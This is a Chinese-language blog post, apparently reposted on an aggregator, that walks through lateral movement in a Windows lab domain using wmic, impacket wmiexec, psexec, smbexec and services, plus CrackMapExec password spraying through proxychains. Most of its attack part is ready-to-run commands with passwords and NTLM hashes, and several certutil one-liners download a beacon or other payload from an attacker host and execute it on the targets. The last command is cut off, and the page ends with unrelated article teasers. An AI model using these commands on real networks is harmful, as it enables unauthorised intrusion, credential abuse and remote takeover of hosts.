内网渗透之横向移动wmismb密码喷射CrackMapExec

news2024/11/13 15:16:32

0x01 横向移动之wmi

wmi可以通过hash或明文进行验证,不会在系统日志中留下痕迹,使用139端口

复现环境:
god.org win2008 dc win2012sql win2008 web

准备:
cs上线 win2008web
提权利用ms14-058
抓取hash和明文密码(当获取到其他主机就重复提权和抓取密码)
扫描存活主机,扫描端口
生成正向连接木马,上传至根目录(方便其他主机下载执行后门)
开启socks代理
配置全局代理工具(注意代理服务器是cs服务端ip,而不是cs上线主机ip)
注意在cs中执行windows命令前面要加shell 如shell dir

1.自带命令
01wmi(无回显)
wmi是windows自带的命令,不会存在被杀的情况

下载后门并执行后门

下载后门
wmic /node:192.168.3.32 /user:administrator /password:Admin12345 process call create "cmd.exe /c certutil -urlcache -split -f http://192.168.3.31/beacon.exe c:/beacon.exe"
执行后门
wmic /node:192.168.3.32 /user:administrator /password:Admin12345 process call create "c:/beacon.exe"
连接
connect 192.168.32

成功执行命令
在这里插入图片描述

02cscript(交互式)
需要利用一个vbs脚本,会弹回一个cmd,不适用在cs中,cs黑窗口弹不出来
自带的命令,本机开代理也用不了,因为好像要用到rpc服务器,本地虽然能和目标主机通信,但是rpc服务器不对,弹不回来cmd
在这里插入图片描述

上传csript.vbs
cscript //nologo wmiexec.vbs /shell 192.168.3.21 administrator Admin12345

在这里插入图片描述
2.impacket套件wmiexec(exe,py)
支持hansh和明文
python版本

无域
执行whoami命令
python wmiexec.py  ./administrator:admin!@#45@192.168.3.32 "whoami"
python wmiexec.py -hashes :518b98ad4178a53695dc997aa02d455c ./administrator@192.168.3.32 "whoami"
有域下载木马并执行木马
python wmiexec.py  god/administrator:Admin1235@192.168.3.21 "cmd.exe /c certutil -urlcache -split -f http://192.168.3.31/beacon.exe c:/beacon.exe&&c:/beacon.exe"
连接
connect 192.168.3.21 4444

在这里插入图片描述exe一样的操作,不在演示了,这个地方可以不上传exe到目标主机上去进行横向移动,可以开代理本地使用

0x02 横向移动之smb

利用SMB服务可以通过明文或hash传递来远程执行,条件445服务端口开放
1.psexec
pstools(windows官方自带工具),适用于远程连接上去了(rdp),有图形化界面

psexec64 \\192.168.3.32 -u administrator -p admin!@#45 -s cmd

在这里插入图片描述
impacket psexec(exe版本)
支持hash和明文

psexec -hashes :518b98ad4178a53695dc997aa02d455c ./administrator@192.168.3.32

在这里插入图片描述
python版本类似,不在演示

2.impaket smbexec
exe版本,支持hash和明文

有域
smbexec god/administrator:Admin12345@192.168.3.32
无域
smbexec -hashes :518b98ad4178a53695dc997aa02d455c ./administrator@192.168.3.32

在这里插入图片描述
在这里插入图片描述
python版本类似不在演示
2.cs插件
视图代开目录列表
目录列表中选中横向移动psexec,填入ip,hash,密码用户名等进行移动,绑定监听器,选定会话
在这里插入图片描述
在这里插入图片描述
成功上线
在这里插入图片描述
3.services

生成木马,上传木马
执行木马上线的
services -hashes :518b98ad4178a53695dc997aa02d455c ./administrator:@192.168.3.32 create -name shell -display shellexec -path C:\Windows\System32\shell.exe
services -hashes :518b98ad4178a53695dc997aa02d455c ./administrator:@192.168.3.32 start -name shell

0x03 密码喷射工具CrackMapExec使用

kali安装:
apt-get install crackmapexec
如果安装不成功就换kali换安装源试一试,官方源成功

使用:

密码喷射域登录(验证用户名密码是否正确):
proxychains4 crackmapexec smb 192.168.3.21-32 -u administrator -p 'admin!@#45'

密码喷射本地登录(验证用户名密码是否正确):
proxychains4 crackmapexec smb 192.168.3.21-32 -u administrator -p 'admin!@#45' --local-auth

密码喷射本地登录命令执行:
proxychains4 crackmapexec smb 192.168.3.21-32 -u administrator -p 'admin!@#45' -x 'whoami' --local-auth

cs上线为反向连接,需要代理转发,转发上线
密码喷射本地登录命令执行上线:
proxychains4 crackmapexec smb 192.168.3.21-32 -u administrator -p 'admin!@#45' -x 'cmd.exe /c certutil -urlcache -split -f http://192.168.3.31/4455.exe c:/4455.exe & c:/4455.exe' --local-auth


密码喷射域登录命令执行上线:
proxychains4 crackmapexec smb 192.168.3.21-32 -u administrator -p 'admin!@#45' -x 'cmd.exe /c certutil -urlcache -split -f http://192.168.3.31/4455.exe c:/4455.exe & c:/4455.exe'

密码喷射本地&域登录命令执行全自动上线:
写两个字典,一个放用户名,另一个放密码
proxychains4 crackmapexec smb 192.168.3.21-32 -u user.txt -p pass.txt -x 'cmd.exe /c certutil -urlcache -split -f http://192.168.3.31/4455.exe c:/4455.exe & c:/4455.exe'
proxychains4 crackmapexec smb 192.16

在这里插入图片描述

本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若转载,请注明出处:http://www.coloradmin.cn/o/447910.html

如若内容造成侵权/违法违规/事实不符,请联系多彩编程网进行投诉反馈,一经查实,立即删除!

相关文章

重磅发布,时隔两月——复旦大学MOSS最新0.0.3版本发布

今天中午吃饭的时候无意间看到一则新闻说的就是复旦大学开发的MOSS也就是国产版的类chatGPT对话模型已经发布了最新版本0。0.3,目前公测期间是完全开源免费的,还是可以上手体验一下的。 官方的博客介绍在这里,首页如下所示: 如果…

手机端无线投屏技术及方案推荐

目前主流的无线投屏技术主要又DLNA,Miracast,Airplay。 对协议的描述引用知乎作者的文章,原文:AirPlay、Miracast 、DLNA三大协议对比 - 知乎 (zhihu.com) 【DLNA】 DNLA,Digital Living Network Alliance&#xff…

光照的个人推导过程与GL实现

目录 1、前提知识 1.1、GL的绘图过程: 1.2、点积的规则和作用: 1.3、normalize在方向处理上的作用 2、光照控制的理论基础 2.1、自由的实现: 2.2、带有方向性的光——基于dot product的实现 最终效果演示如下: 3、关键代…

可能是史上最详细的MySQL用户和权限原理和实战

前言 MySQL是一个关系型数据库管理系统,由瑞典MySQL AB 公司开发,属于 Oracle 旗下产品。MySQL是最流行的关系型数据库管理系统之一,在 WEB 应用方面,MySQL是最好的 RDBMS (Relational Database Management System,关系…

Python - Jupyter - 远程连接Jupyter内核

Python - Jupyter - 远程连接Jupyter内核 前言 假设你有一台高性能服务器(电脑B),并且在上面安装好了Jupyter 现在你想使用你自己常用的电脑(电脑A)编码,但使用电脑B的计算资源。 怎么办呢?…

WPS以普通会员价格升级超级会员

文章目录 一、新会员体系二、基本原理三、升级超级会员1、购买会员时长2、成功通知3、兑换时长 一、新会员体系 4月17日,WPS会员体系全新升级。本次升级,WPS将原“WPS会员”、“稻壳会员”及“超级会员”合并、升级,推出全新的“WPS超级会员…

235:vue+openlayers 绘制带有径向渐变填充色的圆形

第235个 点击查看专栏目录 本示例的目的是介绍如何在vue+openlayer中绘制带有径向渐变填充色的圆形。 如果填充线性渐变的多边形,可以参考这个篇文章 直接复制下面的 vue+openlayers源代码,操作2分钟即可运行实现效果 文章目录 示例效果配置方式示例源代码(共136行)相关A…

通过python代码自定义ssh密码爆破

通过python代码自定义ssh密码爆破 一,这段代码的意义:二,直接上写好的代码:三,使用pip3 install paramiko 命令安装库四,使用 python3 test.py 主机地址 -u 用户名 -p 字典路径/五,字典的选取 一&#xff0…

RT-DETR的学习笔记

1. RT-DETR GitHub: PaddleDetection/tree/develop/configs/rtdetr 2. 复现训练流程 2.1 原文使用设备 2.2 环境要求 4*v100 cuda 10.2 paddlepaddle-gpu > 2.4.1 2.3 创建conda环境 conda create --name ppdet python3.102.4 安装RT-DETR推荐的paddle版本 前往官网…

4.26和4.27、selectAPI介绍(4.27、select代码)

4.26和4.27、selectAPI介绍(4.27、select代码) 1.selectAPI介绍①select多路复用流程图②select多路复用缺点 2.select代码使用介绍3.select代码实现①select服务端实现②select客户端实现 1.selectAPI介绍 主旨思想: 首先要构造一个关于文件…

FreeRTOS 其他任务 API 函数

文章目录 一、任务相关 API 函数预览二、任务相关 API 函数详解1. 函数 uxTaskPriorityGet()2. 函数 vTaskPrioritySet()3. uxTaskGetSystemState()4. 函数 vTaskGetInfo()5. 函数 xTaskGetApplicationTaskTag()6. 函数 xTaskGetCurrentTaskHandle()7. 函数 xTaskGetHandle()8.…

(十二)rk3568 NPU 中部署自己训练的模型,(1)使用yolov5训练自己的数据集-模型训练部分

一、rknn的demo中已经给了yolov5的后处理demo。但是这个后处理只适合yolov5特定版本(v5.0),还有下载特定的分支,如下为下载位置:。 下载地址 ONNX > CoreML > TFLite">GitHub - ultralytics/yolov5: YOLOv5 🚀 in PyTorch > ONNX > CoreML > T…

LeetCode 27.移除元素

文章目录 💡题目分析💡解题思路🚩思路1:暴力求解 --- 遍历🔔接口源码:🚩思路2:空间换时间🔔接口源码:🚩思路3:双指针(快慢指针)🔔接口…

Linux系统之部署Samba服务

Linux系统之部署Samba服务 一、Samba服务介绍1.Samba服务简介2.NFS和CIFS简介3.Smaba服务相关包4.samba监听端口4.samba相关工具及命令 二、环境规划介绍1.环境规划2.本次实践介绍 三、Samba服务端配置1.检查yum仓库2.安装smaba相关软件包3.创建共享目录4.设置共享目录权限5.新…

Adobe认证证书

Adobe认证证书是Adobe公司颁发的一种专业认证证书,用于证明持有人在相关Adobe软件的使用和应用方面具有专业水平。该证书是业内公认的专业认证,具有较高的价值和认可度,可以帮助持有人提高职业竞争力和工作效率。 Adobe公司提供了多种认证考…

CentOS7(三)MySQL8 Redis7 (单机)安装

文章目录 一、MySQL安装1、确认是否有老版本2、在线安装3、本地安装 二、启动MySQL三、MySQL常用配置1、密码修改2、配置远程登录3、开启防火墙 3306 端口4、 报错5、MySQL中Java写入时间少14小时 四、Redis 安装1、安装Redis依赖2、启动redis3、指定配置启动 & 后台运行4、…

手机端H5地图调起开发实战案例解析(百度高德腾讯地图调起、底部弹出层、提示安装地图导航APP)

文章目录 1.导航菜单配置构建导航菜单容器设置取消事件调起菜单样式表 2.地图调起事件导航到这里获取导航坐标百度坐标系 (BD-09) 与 火星坐标系 (GCJ-02)的转换 3.地图调起效果 地图调起功能,是地图URI API是为开发者提供直接调起地图产品(手机客户端&a…

nextjs13临时笔记

动态路由 文件夹以中括号命名[id] -pages: --list: ---[id]: ----index.jsx(访问路径/list/1 即这种形式/list/:id) ---index.jsx(访问路径/list)[...params]gpt接口分析 初始化项目 npm install next react react-dom # or yarn add next react react-dom # or pnpm add n…

WPF教程(六)--依赖属性(2)--属性值优先级与继承

一、 依赖属性的优先级 由于WPF 允许我们可以在多个地方设置依赖属性的值,所以我们就必须要用一个标准来保证值的优先级别。比如下面的例子中,我们在三个地方设置了按钮的背景颜色,那么哪一个设置才会是最终的结果呢?是Black、Re…

[oeasy]python0136_接收输入_input函数_字符串_str

输入变量 回忆上次内容 上次研究了 一行赋值多个变量 a b 5a, b 7, 8 还研究了 标识符的惯用法 python使用的是 snake_case蛇形命名法用下划线 分隔开小写字母的 方法这样就可以 更合理地 命名变量了 变量变量 能变的量我可以 手工输入变量的值 吗?&#x1f9…